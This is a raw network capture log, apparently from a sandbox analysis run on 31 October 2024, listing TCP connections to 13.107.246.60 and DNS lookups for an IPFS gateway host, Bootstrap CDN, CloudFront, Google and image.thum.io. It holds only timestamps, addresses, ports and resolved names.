                                                  Oct 31, 2024 20:50:56.996047974 CET52446443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.996047974 CET52446443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.996066093 CET4435244613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.996081114 CET4435244613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.063961029 CET4435244513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.064028025 CET4435244513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.064285040 CET52445443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.064285040 CET52445443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.064430952 CET52445443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.064450026 CET4435244513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.067195892 CET52450443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.067224979 CET4435245013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.067468882 CET52450443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.067468882 CET52450443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.067507029 CET4435245013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.130654097 CET4435244613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.130873919 CET4435244613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.130912066 CET4435244613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.130937099 CET52446443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.131002903 CET52446443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.131077051 CET52446443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.131088972 CET4435244613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.131122112 CET52446443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.131128073 CET4435244613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.134141922 CET52451443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.134175062 CET4435245113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.134701014 CET52451443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.134887934 CET52451443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.134901047 CET4435245113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.218635082 CET4435244713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.219285965 CET52447443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.219312906 CET4435244713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.219573021 CET52447443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.219579935 CET4435244713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.347136021 CET4435244713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.347335100 CET4435244713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.347446918 CET52447443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.347560883 CET52447443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.347560883 CET52447443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.347584963 CET4435244713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.347594023 CET4435244713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.353239059 CET52452443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.353312969 CET4435245213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.353537083 CET52452443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.353915930 CET52452443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.353950977 CET4435245213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.403959990 CET4435244813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.405003071 CET52448443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.405003071 CET52448443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.405019045 CET4435244813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.405033112 CET4435244813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.534646034 CET4435244813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.534703016 CET4435244813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.534746885 CET4435244813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.534940958 CET52448443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.534987926 CET52448443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.541342020 CET4435244913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.547591925 CET52448443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.547591925 CET52448443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.547610044 CET4435244813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.547620058 CET4435244813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.548934937 CET52449443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.548950911 CET4435244913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.550734997 CET52449443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.550743103 CET4435244913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.550759077 CET52453443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.550793886 CET4435245313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.550964117 CET52453443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.551059961 CET52453443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.551065922 CET4435245313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.677397013 CET4435244913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.677476883 CET4435244913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.677664042 CET52449443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.680208921 CET52449443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.680208921 CET52449443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.680227041 CET4435244913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.680237055 CET4435244913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.685560942 CET52454443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.685637951 CET4435245413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.685724020 CET52454443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.691430092 CET52454443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.691463947 CET4435245413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.809847116 CET4435245013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.818562984 CET52450443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.818584919 CET4435245013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.821012020 CET52450443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.821019888 CET4435245013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.879709959 CET4435245113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.885603905 CET52451443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.885612965 CET4435245113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.886639118 CET52451443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.886643887 CET4435245113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.946432114 CET4435245013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.947336912 CET4435245013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.947391987 CET4435245013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.947479963 CET52450443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.947479963 CET52450443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.947525978 CET52450443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.947539091 CET4435245013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.952270031 CET52455443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.952311039 CET4435245513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:57.952469110 CET52455443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.952775002 CET52455443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:57.952789068 CET4435245513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.051999092 CET4435245113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.052375078 CET4435245113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.052680016 CET52451443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.052680969 CET52451443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.052875996 CET52451443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.052889109 CET4435245113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.055259943 CET52456443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.055365086 CET4435245613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.055599928 CET52456443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.055599928 CET52456443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.055640936 CET4435245613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.118789911 CET4435245213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.119801998 CET52452443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.119801998 CET52452443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.119867086 CET4435245213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.119913101 CET4435245213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.253871918 CET4435245213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.253938913 CET4435245213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.254087925 CET4435245213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.254211903 CET52452443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.254268885 CET52452443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.254268885 CET52452443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.254306078 CET4435245213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.254332066 CET4435245213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.257100105 CET52457443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.257137060 CET4435245713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.257285118 CET52457443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.257384062 CET52457443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.257395029 CET4435245713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.293487072 CET4435245313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.294460058 CET52453443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.294460058 CET52453443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.294476986 CET4435245313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.294495106 CET4435245313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.429727077 CET4435245313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.430212975 CET4435245313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.430360079 CET52453443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.430444956 CET52453443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.430444956 CET52453443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.430469990 CET4435245313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.430481911 CET4435245313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.433152914 CET52458443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.433243990 CET4435245813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.433455944 CET52458443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.433520079 CET52458443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.433538914 CET4435245813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.436024904 CET4435245413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.436852932 CET52454443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.436852932 CET52454443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.436887026 CET4435245413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.436924934 CET4435245413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.571815014 CET4435245413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.572231054 CET4435245413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.572300911 CET52454443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.572401047 CET52454443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.572451115 CET4435245413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.572484970 CET52454443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.572503090 CET4435245413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.575318098 CET52459443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.575336933 CET4435245913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.575515032 CET52459443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.575747013 CET52459443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.575761080 CET4435245913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.718130112 CET4435245513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.718734026 CET52455443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.718744040 CET4435245513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.719347000 CET52455443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.719352007 CET4435245513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.797204018 CET4435245613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.798135042 CET52456443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.798198938 CET4435245613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.798793077 CET52456443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.798809052 CET4435245613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.853687048 CET4435245513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.853751898 CET4435245513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.853884935 CET52455443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.854006052 CET52455443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.854032040 CET4435245513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.854038954 CET52455443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.854043961 CET4435245513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.857428074 CET52460443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.857455969 CET4435246013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.857522011 CET52460443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.857682943 CET52460443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.857697010 CET4435246013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.928443909 CET4435245613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.928472996 CET4435245613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.928515911 CET4435245613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.928582907 CET52456443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.928736925 CET52456443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.928738117 CET52456443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.928775072 CET4435245613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.928797960 CET4435245613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.931221962 CET52461443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.931257010 CET4435246113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:58.931353092 CET52461443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.931557894 CET52461443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:58.931570053 CET4435246113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.029978991 CET4435245713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.030412912 CET52457443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.030431032 CET4435245713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.031017065 CET52457443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.031022072 CET4435245713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.163583040 CET4435245713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.163723946 CET4435245713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.163796902 CET52457443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.164026022 CET52457443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.164036989 CET4435245713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.164048910 CET52457443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.164052963 CET4435245713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.166723967 CET52462443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.166754007 CET4435246213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.166846991 CET52462443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.167140007 CET52462443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.167152882 CET4435246213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.175843000 CET4435245813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.176217079 CET52458443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.176230907 CET4435245813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.176672935 CET52458443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.176680088 CET4435245813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.306906939 CET4435245813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.306936026 CET4435245813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.306977034 CET4435245813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.307004929 CET52458443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.307038069 CET52458443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.307363033 CET52458443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.307363033 CET52458443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.307391882 CET4435245813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.307401896 CET4435245813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.310586929 CET52463443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.310627937 CET4435246313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.310692072 CET52463443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.310872078 CET52463443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.310884953 CET4435246313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.322532892 CET4435245913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.323180914 CET52459443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.323191881 CET4435245913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.323765039 CET52459443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.323769093 CET4435245913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.471344948 CET4435245913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.471401930 CET4435245913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.471591949 CET52459443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.471626043 CET52459443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.471636057 CET4435245913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.471645117 CET52459443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.471648932 CET4435245913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.474759102 CET52464443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.474776983 CET4435246413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.474854946 CET52464443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.475167990 CET52464443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.475179911 CET4435246413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.608565092 CET4435246013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.609033108 CET52460443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.609057903 CET4435246013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:59.609498024 CET52460443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:59.609503984 CET4435246013.107.246.60192.168.2.4
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 31, 2024 20:49:38.416075945 CET53566201.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:38.462563038 CET53492651.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:39.411262989 CET5640953192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:39.411696911 CET5220953192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:39.424539089 CET53522091.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:39.426171064 CET53564091.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:39.718710899 CET53614671.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:40.739140987 CET5469853192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:40.741919994 CET6425953192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:40.746324062 CET53546981.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:40.749094963 CET53642591.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:40.764439106 CET5759553192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:40.764673948 CET5704153192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:40.765997887 CET53645371.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:40.766380072 CET53629271.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:40.771085978 CET53604761.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:40.782826900 CET53575951.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:40.785073042 CET53570411.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:42.905797005 CET6023253192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:42.906608105 CET6422953192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:42.913230896 CET53602321.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:42.913784027 CET53642291.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:43.050998926 CET6113353192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:43.051280975 CET5276453192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:43.062664032 CET53631661.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:43.068386078 CET53611331.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:43.068428040 CET53527641.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:43.090681076 CET6094853192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:43.091026068 CET5955953192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:49:43.109325886 CET53595591.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:43.124850035 CET53609481.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:44.578735113 CET53583521.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:44.581114054 CET53605491.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:44.583079100 CET53511301.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:45.782305002 CET53495701.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:47.098433971 CET53565461.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:49:53.883606911 CET138138192.168.2.4192.168.2.255
                                                  Oct 31, 2024 20:49:57.420252085 CET53568061.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:50:02.684662104 CET53654511.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:50:38.016715050 CET53565801.1.1.1192.168.2.4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 31, 2024 20:49:39.411262989 CET192.168.2.41.1.1.10xe872Standard query (0)bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.linkA (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:39.411696911 CET192.168.2.41.1.1.10x591aStandard query (0)bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link65IN (0x0001)false
                                                  Oct 31, 2024 20:49:40.739140987 CET192.168.2.41.1.1.10x2fa1Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:40.741919994 CET192.168.2.41.1.1.10x68c3Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                  Oct 31, 2024 20:49:40.764439106 CET192.168.2.41.1.1.10x40dcStandard query (0)d12y7sg0iam4lc.cloudfront.netA (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:40.764673948 CET192.168.2.41.1.1.10xfee1Standard query (0)d12y7sg0iam4lc.cloudfront.net65IN (0x0001)false
                                                  Oct 31, 2024 20:49:42.905797005 CET192.168.2.41.1.1.10xb557Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:42.906608105 CET192.168.2.41.1.1.10x7ad1Standard query (0)www.google.com65IN (0x0001)false
                                                  Oct 31, 2024 20:49:43.050998926 CET192.168.2.41.1.1.10xc57Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:43.051280975 CET192.168.2.41.1.1.10xf10Standard query (0)www.google.com65IN (0x0001)false
                                                  Oct 31, 2024 20:49:43.090681076 CET192.168.2.41.1.1.10xbc6bStandard query (0)image.thum.ioA (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:43.091026068 CET192.168.2.41.1.1.10x8540Standard query (0)image.thum.io65IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 31, 2024 20:49:39.424539089 CET1.1.1.1192.168.2.40x591aNo error (0)bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link65IN (0x0001)false
                                                  Oct 31, 2024 20:49:39.426171064 CET1.1.1.1192.168.2.40xe872No error (0)bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link209.94.90.3A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:39.426171064 CET1.1.1.1192.168.2.40xe872No error (0)bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link209.94.90.2A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:40.746324062 CET1.1.1.1192.168.2.40x2fa1No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:40.746324062 CET1.1.1.1192.168.2.40x2fa1No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:40.749094963 CET1.1.1.1192.168.2.40x68c3No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                  Oct 31, 2024 20:49:40.782826900 CET1.1.1.1192.168.2.40x40dcNo error (0)d12y7sg0iam4lc.cloudfront.net18.65.39.18A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:40.782826900 CET1.1.1.1192.168.2.40x40dcNo error (0)d12y7sg0iam4lc.cloudfront.net18.65.39.43A (IP address)IN (0x0001)false
